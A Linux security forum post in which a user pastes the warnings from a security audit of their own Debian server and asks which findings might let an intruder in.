--WARN-- [sig004w] None of the following versions of /usr/sbin/rpc.mountd 
         (-rwxr-x---) matched the /usr/sbin/rpc.mountd on this machine. 
         >>>>>> Linux 2.4.17 
         
--WARN-- [sig004w] None of the following versions of /usr/sbin/sshd 
         (-rwxr-xr-x) matched the /usr/sbin/sshd on this machine. 
         >>>>>> Linux 2.4.17 
         
--WARN-- [sig004w] None of the following versions of /usr/sbin/tcpd 
         (-rwxr-x---) matched the /usr/sbin/tcpd on this machine. 
         >>>>>> Linux 2.4.17 
         

# Checking for known intrusion signs...
# Testing for promiscuous interfaces with /sbin/ifconfig
# Testing for backdoors in inetd.conf

# Performing check of files in system mail spool...
--WARN-- [kis008w] File "BOGUS.info.0vlB" in the mail spool, owned by "root". 
--WARN-- [kis008w] File "BOGUS.jacqueline.FrE" in the mail spool, owned by 
         "postfix". 
--WARN-- [kis008w] File "BOGUS.nath18.QrE" in the mail spool, owned by 
         "postfix". 
--WARN-- [kis008w] File "BOGUS.tut96.crE" in the mail spool, owned by 
         "postfix". 
--WARN-- [kis008w] File "anniversary" in the mail spool, owned by "postfix". 
--WARN-- [kis008w] File "apache" in the mail spool, owned by "postfix". 
--WARN-- [kis008w] File "biz" in the mail spool, owned by "postfix". 
--WARN-- [kis008w] File "brock83" in the mail spool, owned by "postfix". 
--WARN-- [kis008w] File "bryan" in the mail spool, owned by "postfix". 
--WARN-- [kis008w] File "coach" in the mail spool, owned by "postfix". 
--WARN-- [kis008w] File "david.orig" in the mail spool, owned by "david". 
--WARN-- [kis008w] File "dbnfl" in the mail spool, owned by "postfix". 
--WARN-- [kis008w] File "dennis" in the mail spool, owned by "postfix". 
--WARN-- [kis008w] File "desktop" in the mail spool, owned by "postfix". 
--WARN-- [kis008w] File "intricateone" in the mail spool, owned by "postfix". 
--WARN-- [kis008w] File "mail.spool.tar.bz2" in the mail spool, owned by 
         "root". 
--WARN-- [kis008w] File "metadot" in the mail spool, owned by "postfix". 
--WARN-- [kis008w] File "mikesea" in the mail spool, owned by "postfix". 
--WARN-- [kis008w] File "misspurple" in the mail spool, owned by "postfix". 
--WARN-- [kis008w] File "neill" in the mail spool, owned by "postfix". 
--WARN-- [kis008w] File "old" in the mail spool, owned by "postfix". 
--WARN-- [kis008w] File "pic" in the mail spool, owned by "mrx". 
--WARN-- [kis008w] File "proc.log" in the mail spool, owned by "root". 
--WARN-- [kis008w] File "rick" in the mail spool, owned by "postfix". 
--WARN-- [kis008w] File "rick51" in the mail spool, owned by "postfix". 
--WARN-- [kis008w] File "server" in the mail spool, owned by "postfix". 
--WARN-- [kis008w] File "surveys" in the mail spool, owned by "postfix". 
--WARN-- [kis008w] File "totalsuccess" in the mail spool, owned by "postfix". 
--WARN-- [kis008w] File "vcook" in the mail spool, owned by "postfix". 
--WARN-- [kis008w] File "walton60" in the mail spool, owned by "postfix". 
--WARN-- [kis008w] File "wapcaplet" in the mail spool, owned by "postfix". 

# Performing check for rookits...
# Running chkrootkit (/usr/sbin/chkrootkit) to perform further checks...

# Performing system specific checks...
# Performing checks for Linux/2...

# Checking for single user-mode password...

# Checking boot loader file permissions...
--WARN-- [boot02] The configuration file /boot/grub/menu.lst has group 
         permissions. Should be 0600 
--FAIL-- [boot02] The configuration file /boot/grub/menu.lst has world 
         permissions. Should be 0600 
--WARN-- [boot06] The Grub bootloader does not have a password configured. 

# Checking for vulnerabilities in inittab configuration...

# Checking for correct umask settings for init scripts...
--FAIL-- [misc017f] The umask setting in /etc/csh.login for the init scripts 
         is insecure 
--FAIL-- [misc017f] The umask setting in /etc/profile for the init scripts is 
         insecure 

# Checking Logins not used on the system ...

# Checking network configuration
--FAIL-- [lin010f] The system is configured to answer to ICMP broadcasts 
--WARN-- [lin012w] The system accepts ICMP redirection messages 
--FAIL-- [lin013f] The system is not protected against Syn flooding attacks 
--FAIL-- [lin016f] The system permits source routing from incoming packets 
--WARN-- [lin017w] The system is not configured to log suspicious (martian) 
         packets 
--FAIL-- [lin019f] The system does not have any local firewall rules 
         configured
 
Old 02-22-2007, 02:57 AM   #15
DaveQB
Member
 
Registered: Oct 2003
Location: Sydney, Australia.
Distribution: Debian, Ubuntu
Posts: 400

Original Poster
Rep: Reputation: 39
Code:
# Verifying system specific password checks...
--WARN-- [pass19w] Login ID root does not have password aging enabled. 
--WARN-- [pass19w] Login ID bin does not have password aging enabled. 
--WARN-- [pass19w] Login ID anniversary does not have password aging enabled. 
--WARN-- [pass19w] Login ID ben does not have password aging enabled. 
--WARN-- [pass19w] Login ID biz does not have password aging enabled. 
--WARN-- [pass19w] Login ID coach does not have password aging enabled. 
--WARN-- [pass19w] Login ID david does not have password aging enabled. 
--WARN-- [pass19w] Login ID dennis does not have password aging enabled. 
--WARN-- [pass19w] Login ID info does not have password aging enabled. 
--WARN-- [pass19w] Login ID intricateone does not have password aging enabled. 
--WARN-- [pass19w] Login ID jacqueline does not have password aging enabled. 
--WARN-- [pass19w] Login ID jacwar does not have password aging enabled. 
--WARN-- [pass19w] Login ID jj does not have password aging enabled. 
--WARN-- [pass19w] Login ID jobs does not have password aging enabled. 
--WARN-- [pass19w] Login ID jw does not have password aging enabled. 
--WARN-- [pass19w] Login ID lee44 does not have password aging enabled. 
--WARN-- [pass19w] Login ID marie does not have password aging enabled. 
--WARN-- [pass19w] Login ID mrx does not have password aging enabled. 
--WARN-- [pass19w] Login ID nath18 does not have password aging enabled. 
--WARN-- [pass19w] Login ID rick51 does not have password aging enabled. 
--WARN-- [pass19w] Login ID robyn does not have password aging enabled. 
--WARN-- [pass19w] Login ID rwebster does not have password aging enabled. 
--WARN-- [pass19w] Login ID sam does not have password aging enabled. 
--WARN-- [pass19w] Login ID spamd does not have password aging enabled. 
--WARN-- [pass19w] Login ID steve21 does not have password aging enabled. 
--WARN-- [pass19w] Login ID tak does not have password aging enabled. 
--WARN-- [pass19w] Login ID te22 does not have password aging enabled. 
--WARN-- [pass19w] Login ID test does not have password aging enabled. 
--WARN-- [pass19w] Login ID totalsuccess does not have password aging enabled. 
--WARN-- [pass19w] Login ID tut96 does not have password aging enabled. 
--WARN-- [pass19w] Login ID walton60 does not have password aging enabled. 
--WARN-- [pass19w] Login ID neill does not have password aging enabled. 

# Checking OS release...

# Checking installed packages vs Debian Security Advisories...

# Checking md5sums of installed files
--FAIL-- [lin005f] Installed file `/var/lib/rkhunter/db/mirrors.dat' checksum 
         differs from installed package 'rkhunter'. 
--FAIL-- [lin005f] Installed file `/var/lib/rkhunter/db/os.dat' checksum 
         differs from installed package 'rkhunter'. 
--FAIL-- [lin005f] Installed file `/var/lib/rkhunter/db/programs_good.dat' 
         checksum differs from installed package 'rkhunter'. 
--FAIL-- [lin005f] Installed file `/var/lib/rkhunter/db/defaulthashes.dat' 
         checksum differs from installed package 'rkhunter'. 

# Checking installed files against packages...
--WARN-- [lin001w] File 
         `/lib/modules/2.6.8-3-686/kernel/drivers/net/F5D5005.ko' does not 
         belong to any package. 
--WARN-- [lin001w] File `/lib/modules/2.6.8-3-686/misc/vmmon.o' does not 
         belong to any package. 
--WARN-- [lin001w] File `/lib/modules/2.6.8-3-686/misc/vmnet.o' does not 
         belong to any package. 
--WARN-- [lin001w] File `/usr/sbin/vmware-authd' does not belong to any 
         package. 
--WARN-- [lin001w] File `/usr/sbin/vmware-serverd' does not belong to any 
         package. 
--WARN-- [lin001w] File `/usr/bin/nosetests' does not belong to any package. 
--WARN-- [lin001w] File `/usr/bin/vmware-uninstall.pl' does not belong to any 
         package. 
--WARN-- [lin001w] File `/usr/bin/vmnet-bridge' does not belong to any 
         package. 
--WARN-- [lin001w] File `/usr/bin/vmnet-sniffer' does not belong to any 
         package. 
--WARN-- [lin001w] File `/usr/bin/vmnet-netifup' does not belong to any 
         package. 
--WARN-- [lin001w] File `/usr/bin/vmnet-dhcpd' does not belong to any package. 
--WARN-- [lin001w] File `/usr/bin/vmware-loop' does not belong to any package. 
--WARN-- [lin001w] File `/usr/bin/vmware' does not belong to any package. 
--WARN-- [lin001w] File `/usr/bin/vmrun' does not belong to any package. 
--WARN-- [lin001w] File `/usr/bin/vmware-mount.pl' does not belong to any 
         package. 
--WARN-- [lin001w] File `/usr/bin/vmware-config.pl' does not belong to any 
         package. 
--WARN-- [lin001w] File `/usr/bin/vmware-vdiskmanager' does not belong to any 
         package. 
--WARN-- [lin001w] File `/usr/bin/vmware-ping' does not belong to any package. 
--WARN-- [lin001w] File `/usr/bin/vmnet-natd' does not belong to any package. 
--WARN-- [lin001w] File `/usr/bin/vmware-cmd' does not belong to any package. 
--WARN-- [lin001w] File `/usr/bin/vmware-authtrusted' does not belong to any 
         package. 
--WARN-- [lin001w] File `/usr/bin/vm-support' does not belong to any package. 
--WARN-- [lin001w] File `/usr/bin/paster' does not belong to any package. 
--WARN-- [lin001w] File `/usr/bin/cheetah-compile' does not belong to any 
         package. 
--WARN-- [lin001w] File `/usr/bin/cheetah' does not belong to any package. 
--WARN-- [lin001w] File `/usr/bin/easy_install' does not belong to any 
         package. 
--WARN-- [lin001w] File `/usr/bin/easy_install-2.3' does not belong to any 
         package. 

# Performing check of root directory...

# Checking device permissions...
--WARN-- [dev003w] The directory /dev/80gig resides in a device directory. 
--WARN-- [dev003w] The directory /dev/i2o resides in a device directory. 
--FAIL-- [dev002f] /dev/log has world permissions 
--WARN-- [dev003w] The directory /dev/mainsystem resides in a device 
         directory. 

# Checking for existence of log files...
--FAIL-- [logf005f] Log file /var/log/btmp permission should be 660 

# Checking for correct umask settings...

# Checking listening processes 
--WARN-- [lin002i] The process `apcupsd' is listening on socket 3551 (TCP) on 
         every interface. 
--WARN-- [lin002i] The process `cupsd' is listening on socket 631 (TCP) on 
         every interface. 
--WARN-- [lin002i] The process `cupsd' is listening on socket 631 (UDP) on 
         every interface. 
--WARN-- [lin003w] The process `dnsmasq' is listening on socket 53 (TCP on 
         every interface) is run by nobody. 
--WARN-- [lin003w] The process `dnsmasq' is listening on socket 32768 (UDP on 
         every interface) is run by nobody. 
--WARN-- [lin003w] The process `dnsmasq' is listening on socket 53 (UDP on 
         every interface) is run by nobody. 
--WARN-- [lin003w] The process `dnsmasq' is listening on socket 67 (UDP on 
         every interface) is run by nobody. 
--WARN-- [lin002i] The process `dovecot' is listening on socket 143 (TCP) on 
         every interface. 
--WARN-- [lin003w] The process `gkrellmd' is listening on socket 19150 (TCP on 
         every interface) is run by gkrellmd. 
--WARN-- [lin003w] The process `imap-login' is listening on socket 143 (TCP on 
         every interface) is run by dovecot. 
--WARN-- [lin002i] The process `inetd' is listening on socket 113 (TCP) on 
         every interface. 
--WARN-- [lin002i] The process `inetd' is listening on socket 902 (TCP) on 
         every interface. 
--WARN-- [lin002i] The process `master' is listening on socket 25 (TCP) on 
         every interface. 
--WARN-- [lin002i] The process `miniserv.pl' is listening on socket 10000 
         (TCP) on every interface. 
--WARN-- [lin002i] The process `miniserv.pl' is listening on socket 10000 
         (UDP) on every interface. 
--WARN-- [lin002i] The process `munin-node' is listening on socket 4949 (TCP) 
         on every interface. 
--WARN-- [lin003w] The process `mysqld' is listening on socket 3306 (TCP on 
         loopback interface) is run by mysql. 
--WARN-- [lin002i] The process `nmbd' is listening on socket 137 (UDP) on 
         every interface. 
--WARN-- [lin002i] The process `nmbd' is listening on socket 138 (UDP) on 
         every interface. 
--WARN-- [lin003w] The process `portmap' is listening on socket 111 (TCP on 
         every interface) is run by daemon. 
--WARN-- [lin003w] The process `portmap' is listening on socket 111 (UDP on 
         every interface) is run by daemon. 
--WARN-- [lin003w] The process `privoxy' is listening on socket 8118 (TCP on 
         loopback interface) is run by privoxy. 
--WARN-- [lin002i] The process `rpc.mountd' is listening on socket 682 (TCP) 
         on every interface. 
--WARN-- [lin002i] The process `rpc.mountd' is listening on socket 679 (UDP) 
         on every interface. 
--WARN-- [lin002i] The process `rpc.statd' is listening on socket 939 (TCP) on 
         every interface. 
--WARN-- [lin002i] The process `rpc.statd' is listening on socket 933 (UDP) on 
         every interface. 
--WARN-- [lin002i] The process `rpc.statd' is listening on socket 936 (UDP) on 
         every interface. 
--WARN-- [lin002i] The process `slapd' is listening on socket 389 (TCP) on 
         every interface. 
--WARN-- [lin002i] The process `smbd' is listening on socket 139 (TCP) on 
         every interface. 
--WARN-- [lin002i] The process `smbd' is listening on socket 445 (TCP) on 
         every interface. 
--WARN-- [lin003w] The process `sshd' is listening on socket 6010 (TCP on 
         loopback interface) is run by david. 
--WARN-- [lin003w] The process `sshd' is listening on socket 6011 (TCP on 
         loopback interface) is run by david. 

# Checking sshd_config configuration files...

# Checking printer configuration files...
--ERROR-- [init006e] `/etc/printcap' does not exist (file src).
--ERROR-- [init006e] `/etc/printcap' does not exist (file infile).

# Performing common access checks for root...
--FAIL-- [netw020f] There is no /etc/ftpusers file. 

# Checking ntpd configuration...

# Checking unusual file names...
--ALERT-- [fsys005a] Unusual filename `.Equip 2003.index' found: 
-rwxrwxr-x  1 david 501 493 Jan  8 00:22 /home/david/Mail/.Equip 2003.index
--ALERT-- [fsys005a] Unusual filename `.Equip 2003.index.ids' found: 
-rwxrwxr-x  1 david 501 41 Jan  8 00:22 /home/david/Mail/.Equip 2003.index.ids
--ALERT-- [fsys005a] Unusual filename `.Oz Team.index' found: 
-rwxrwxr-x  1 david 501 13139 Jan  8 00:22 /home/david/Mail/.Oz Team.index
--ALERT-- [fsys005a] Unusual filename `.Oz Team.index.ids' found: 
-rwxrwxr-x  1 david 501 153 Jan  8 00:22 /home/david/Mail/.Oz Team.index.ids
--ALERT-- [fsys005a] Unusual filename `.Sent Items.index' found: 
-rwxrwxr-x  1 david 501 277 Jan  8 00:22 /home/david/Mail/.Sent Items.index
--ALERT-- [fsys005a] Unusual filename `.Sent Items.index.ids' found: 
-rwxrwxr-x  1 david 501 37 Jan  8 00:22 /home/david/Mail/.Sent Items.index.ids
--ALERT-- [fsys005a] Unusual filename `.Uni Work.index' found: 
-rwxrwxr-x  1 david 501 1337 Jan  8 00:22 /home/david/Mail/.Uni Work.index
--ALERT-- [fsys005a] Unusual filename `.Uni Work.index.ids' found: 
-rwxrwxr-x  1 david 501 53 Jan  8 00:22 /home/david/Mail/.Uni Work.index.ids
--ALERT-- [fsys005a] Unusual filename `.exe summary.autosave.kwd' found: 
-rwxrwxrwx  1 david 501 9939 Jun  1  2005 /home/david/uni/2005 1st Semester/Account IS/group/.exe summary.autosave.kwd
--ALERT-- [fsys005a] Unusual filename `.marking guidleine.xls.autosave.ksp' 
          found: 
-rwxrwxrwx  1 david 501 15968 Jun  1  2005 /home/david/uni/2005 1st Semester/BISD1/group/.marking guidleine.xls.autosave.ksp
--ALERT-- [fsys005a] Unusual filename `.Equip 2003.index' found: 
-rwxr-xr-x  1 david root 493 Jul 26  2006 /mnt/store/MAIL/david/Mail/.Equip 2003.index
--ALERT-- [fsys005a] Unusual filename `.Equip 2003.index.ids' found: 
-rwxr-xr-x  1 david root 41 Jul 26  2006 /mnt/store/MAIL/david/Mail/.Equip 2003.index.ids
--ALERT-- [fsys005a] Unusual filename `.Oz Team.index' found: 
-rwxr-xr-x  1 david root 13139 Jul 26  2006 /mnt/store/MAIL/david/Mail/.Oz Team.index
--ALERT-- [fsys005a] Unusual filename `.Oz Team.index.ids' found: 
-rwxr-xr-x  1 david root 153 Jul 26  2006 /mnt/store/MAIL/david/Mail/.Oz Team.index.ids
--ALERT-- [fsys005a] Unusual filename `.Sent Items.index' found: 
-rwxr-xr-x  1 david root 277 Jul 26  2006 /mnt/store/MAIL/david/Mail/.Sent Items.index
--ALERT-- [fsys005a] Unusual filename `.Sent Items.index.ids' found: 
-rwxr-xr-x  1 david root 37 Jul 26  2006 /mnt/store/MAIL/david/Mail/.Sent Items.index.ids
--ALERT-- [fsys005a] Unusual filename `.Uni Work.index' found: 
-rwxr-xr-x  1 david root 1337 Jul 26  2006 /mnt/store/MAIL/david/Mail/.Uni Work.index
--ALERT-- [fsys005a] Unusual filename `.Uni Work.index.ids' found: 
-rwxr-xr-x  1 david root 53 Jul 26  2006 /mnt/store/MAIL/david/Mail/.Uni Work.index.ids
--ALERT-- [fsys005a] Unusual filename `..tmp_kallsyms1.o.cmd' found: 
-rw-r--r--  1 root root 561 Jan  4 23:53 /root/dev/linux-2.6.19.1/..tmp_kallsyms1.o.cmd
--ALERT-- [fsys005a] Unusual filename `..tmp_kallsyms2.o.cmd' found: 
-rw-r--r--  1 root root 561 Jan  4 23:54 /root/dev/linux-2.6.19.1/..tmp_kallsyms2.o.cmd
--ALERT-- [fsys005a] Unusual filename `..tmp_vmlinux1.cmd' found: 
-rw-r--r--  1 root root 634 Jan  4 23:53 /root/dev/linux-2.6.19.1/..tmp_vmlinux1.cmd
--ALERT-- [fsys005a] Unusual filename `..tmp_vmlinux2.cmd' found: 
-rw-r--r--  1 root root 650 Jan  4 23:53 /root/dev/linux-2.6.19.1/..tmp_vmlinux2.cmd
--ALERT-- [fsys005a] Unusual filename `..tmp_kallsyms1.o.cmd' found: 
-rw-r--r--  1 root root 433 Jan  5 17:33 /usr/src/kernel-source-2.6.8/..tmp_kallsyms1.o.cmd
--ALERT-- [fsys005a] Unusual filename `..tmp_kallsyms2.o.cmd' found: 
-rw-r--r--  1 root root 433 Jan  5 17:33 /usr/src/kernel-source-2.6.8/..tmp_kallsyms2.o.cmd
--ALERT-- [fsys005a] Unusual filename `..tmp_vmlinux1.cmd' found: 
-rw-r--r--  1 root root 608 Jan  5 17:33 /usr/src/kernel-source-2.6.8/..tmp_vmlinux1.cmd
--ALERT-- [fsys005a] Unusual filename `..tmp_vmlinux2.cmd' found: 
-rw-r--r--  1 root root 624 Jan  5 17:33 /usr/src/kernel-source-2.6.8/..tmp_vmlinux2.cmd


# Looking for unusual device files...

# Checking symbolic links...
--WARN-- [xxxxx] The following files are unowned:
/home/brock83/.bash_logout
/home/brock83/.bash_profile
/home/brock83/.bashrc
/home/brock83/.gimp-1.2
/home/brock83/.gimp-1.2/printrc
/home/brock83/.mailcap
/home/brock83/.screenrc
/home/brock83/tmp
/home/dbnfl/.bash_logout
/home/dbnfl/.bash_profile
/home/dbnfl/.bashrc
/home/dbnfl/.screenrc
/home/dbnfl/tmp
/home/metadot/.bash_history
/home/metadot/.bash_logout
/home/metadot/.bash_profile
/home/metadot/.bashrc
/home/metadot/.screenrc
/home/metadot/tmp
/home/misspurple/.bash_logout
/home/misspurple/.bash_profile
/home/misspurple/.bashrc
/home/misspurple/.gimp-1.2
/home/misspurple/.gimp-1.2/printrc
/home/misspurple/.mailcap
/home/misspurple/.screenrc
/home/misspurple/tmp
/home/neill/.bash_logout
/home/neill/.bash_profile
/home/neill/.bashrc
/home/neill/.screenrc
/home/neill/tmp
/home/surveys/.bash_logout
/home/surveys/.bash_profile
/home/surveys/.bashrc
/home/surveys/.screenrc
/home/surveys/tmp
/home/wapcaplet/.Xauthority
/home/wapcaplet/.bash_history
/home/wapcaplet/.bash_logout
/home/wapcaplet/.bash_profile
/home/wapcaplet/.bashrc
/home/wapcaplet/.screenrc
/home/wapcaplet/.viminfo
/home/wapcaplet/tmp
/varold/www/rc/roundcubemail-0.1beta2/._CHANGELOG
/varold/www/rc/roundcubemail-0.1beta2/.htaccess
/varold/www/rc/roundcubemail-0.1beta2/.htaccess


# Performing check of embedded pathnames...
--WARN-- [embed003w] Path `/var/lib/mailman/bin/list_lists' contains 
         `/var/lib/mailman' which is group `list' writable. 
         Embedded references in: /etc/init.d/mailman
15:56> Security report completed for server.

Obviously lots I can fix there, but anything stand out as a way "in" to my server ?
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
small home network M$ & Debian dbyy Linux - Networking 5 02-12-2007 02:32 AM
Damn small linux & plugin firefox AleLinuxBSD DamnSmallLinux 2 06-06-2006 02:15 PM
Speech recognition for Linux - backdoor? dtee Linux - General 4 01-01-2005 06:26 PM
Damn Small linux & Grub Nasty Linux - Newbie 3 10-14-2003 05:24 PM
My Backdoor Debian Install ClayOgre Debian 9 06-20-2003 09:38 AM

LinuxQuestions.org > Forums > Linux Forums > Linux - Security

All times are GMT -5. The time now is 07:41 PM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Open Source Consulting | Domain Registration